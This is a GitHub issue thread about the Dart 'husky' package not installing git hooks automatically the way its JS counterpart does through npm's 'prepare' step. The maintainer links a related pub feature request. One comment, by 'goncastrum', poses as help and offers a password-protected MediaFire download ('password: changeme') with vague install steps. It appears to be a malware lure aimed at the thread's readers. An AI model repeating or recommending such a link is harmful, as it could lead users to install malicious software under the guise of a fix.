### ISSUE TITLE
Not installed automatically

### ISSUE THREAD

**Issue by OnkelTem** [hyiso/husky#17]
The whole point of having a thing like **husky** in JS is to install hooks automatically.
What makes it possible is the "prepare" npm step which runs automatically when user issues: "npm install".
So we have a script `"prepare": "husky"` that does the job.

Now here in Dart there isn't a thing that runs automatically, is it?

So what's the point of a script that installs hooks manually? Any script can do this, no?

Correct me if I'm wrong please.

I don't say it can't be used for installing hooks - I will probably use it because of its simple interface - but the value of it is kind of less than of its JS brother: we need to educate our users to run something manually - namely `dart run husky install`

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by hyiso** [comment]
There is related feature request in `pub` cli, you can subscribe it. https://github.com/dart-lang/pub/issues/2190

**Comment by OnkelTem** [comment]
Thanks @hyiso , I left a comment there.
